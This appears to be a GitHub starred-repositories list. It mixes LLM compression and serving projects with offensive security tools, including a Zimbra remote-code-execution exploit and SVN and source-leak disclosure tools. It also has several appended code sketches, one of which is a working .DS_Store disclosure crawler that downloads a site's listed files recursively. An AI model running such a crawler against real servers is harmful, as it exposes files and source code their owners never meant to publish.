Stars
Zimbra - Remote Command Execution (CVE-2024-45519)
A .DS_Store file disclosure exploit: it parses the .DS_Store file and recursively downloads the files it lists (a minimal sketch of the technique follows this list).
An SVN information-disclosure helper tool: the script can list a site's directories, read source code files, and download the entire site's code.
We want to see whether ChatGPT or other AI LLMs (Microsoft New Bing or Google Bard) are able to help the user go into a test environment and run commands to solve CTF problems (Whether the AI lar…
Multi-architecture assembler for IDA Pro, powered by Keystone Engine (a standalone Keystone sketch follows this list).
A curated collection of open-source Chinese large language models, focusing on models that are relatively small, can be privately deployed, and are cheap to train, covering base models, vertical-domain fine-tuning and applications, datasets, and tutorials.
Chatbot Ollama is an open source chat UI for Ollama.
Get up and running with Llama 3.3, Mistral, Gemma 2, and other large language models.
🐛 A multi-threaded web application source-code leak scanner
[EMNLP 2024 Industry Track] This is the official PyTorch implementation of "LLMC: Benchmarking Large Language Model Quantization with a Versatile Compression Toolkit".
Neuron Merging: Compensating for Pruned Neurons (NeurIPS 2020)
Code for the paper "EBFT: Effective and Block-Wise Fine-Tuning for Sparse LLMs"
This repository contains code to quantitatively evaluate instruction-tuned models such as Alpaca and Flan-T5 on held-out tasks.
Official style files for papers submitted to venues of the Association for Computational Linguistics
Official PyTorch implementation of our paper accepted at ICLR 2024: "Dynamic Sparse No Training: Training-Free Fine-tuning for Sparse LLMs"
[AAAI 2024] Fluctuation-based Adaptive Structured Pruning for Large Language Models
Implementation of the "Gradients without backpropagation" paper (https://arxiv.org/abs/2202.08587) using functorch (a forward-gradient sketch follows this list).
✨✨Latest Advances on Multimodal Large Language Models
A high-throughput and memory-efficient inference and serving engine for LLMs (a minimal usage sketch follows this list).
This is a collection of our research on efficient AI, covering hardware-aware NAS and model compression.
[ICLR 2024] Sheared LLaMA: Accelerating Language Model Pre-training via Structured Pruning
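As a rough illustration of the .DS_Store disclosure technique mentioned in the entry above, here is a minimal sketch that fetches a site's .DS_Store, reads the file names recorded in it, and recurses into names that look like directories. It assumes the third-party `ds_store` and `requests` packages and a hypothetical target URL; it is not the listed exploit's own code.

```python
# Minimal .DS_Store disclosure crawler sketch (assumes `pip install ds-store requests`).
import tempfile
import requests
from ds_store import DSStore  # assumption: the ds_store package is used for parsing

def crawl(base_url, depth=2):
    """Fetch <base_url>/.DS_Store, try to download each name it records,
    and recurse into names that look like directories."""
    if depth < 0:
        return
    resp = requests.get(base_url.rstrip("/") + "/.DS_Store", timeout=10)
    if resp.status_code != 200:
        return
    # .DS_Store is a binary blob; write it to a temp file so DSStore can open it.
    with tempfile.NamedTemporaryFile(suffix=".DS_Store") as tmp:
        tmp.write(resp.content)
        tmp.flush()
        with DSStore.open(tmp.name) as store:
            names = {entry.filename for entry in store}
    for name in sorted(names):
        url = base_url.rstrip("/") + "/" + name
        r = requests.get(url, timeout=10)
        if r.status_code == 200:
            print(f"found: {url} ({len(r.content)} bytes)")
        if "." not in name:  # crude heuristic: no extension, treat as a directory
            crawl(url, depth - 1)

crawl("http://target.example/")  # hypothetical target
```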
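The IDA Pro plugin entry above is powered by the Keystone Engine; the standalone sketch below shows the Keystone Python bindings assembling a small snippet for two architectures, which is the multi-architecture part of the workflow (assumes `pip install keystone-engine`; the plugin's actual IDA integration is not reproduced here).

```python
# Standalone Keystone sketch: the same asm() call works across architectures
# by swapping the (arch, mode) pair given to the Ks constructor.
from keystone import Ks, KS_ARCH_X86, KS_MODE_64, KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN

targets = [
    ("x86-64", Ks(KS_ARCH_X86, KS_MODE_64), "mov rax, 1\nret"),
    ("arm64", Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN), "mov x0, #1\nret"),
]

for name, ks, source in targets:
    encoding, count = ks.asm(source)  # list of encoded bytes, number of statements
    print(f"{name}: {bytes(encoding).hex()} ({count} statements)")
```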
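For the "Gradients without backpropagation" entry, the core idea is the forward gradient: sample a random tangent v, compute the directional derivative D_v f with a single forward-mode pass, and use (D_v f) * v as an unbiased estimate of the gradient. The sketch below uses torch.func.jvp, the current home of the functorch API named in the entry; it is an independent illustration, not the repository's code.

```python
# Forward-gradient sketch: estimate a gradient with forward-mode JVPs only.
import torch
from torch.func import jvp

def f(theta):
    # Toy objective whose true gradient is 2 * theta.
    return (theta ** 2).sum()

def forward_gradient(func, theta):
    v = torch.randn_like(theta)          # random tangent direction
    _, dv = jvp(func, (theta,), (v,))    # dv = directional derivative D_v f(theta)
    return dv * v                        # unbiased estimate of the gradient

theta = torch.randn(5)
estimate = torch.stack([forward_gradient(f, theta) for _ in range(2000)]).mean(0)
print("estimate:", estimate)
print("true grad:", 2 * theta)
```

Averaging many single-sample estimates is only done here to show the estimator is unbiased; in the paper a single sample per step feeds the optimizer directly.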
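The vLLM entry above is the serving engine itself; a minimal offline-inference sketch with its Python API looks roughly like the following (the model name is only an example, and exact arguments can differ between vLLM versions).

```python
# Minimal vLLM offline-inference sketch (model name is just an example).
from vllm import LLM, SamplingParams

llm = LLM(model="facebook/opt-125m")  # any causal LM vLLM supports
params = SamplingParams(temperature=0.8, max_tokens=64)

outputs = llm.generate(["Explain structured pruning in one sentence."], params)
for out in outputs:
    print(out.outputs[0].text)
```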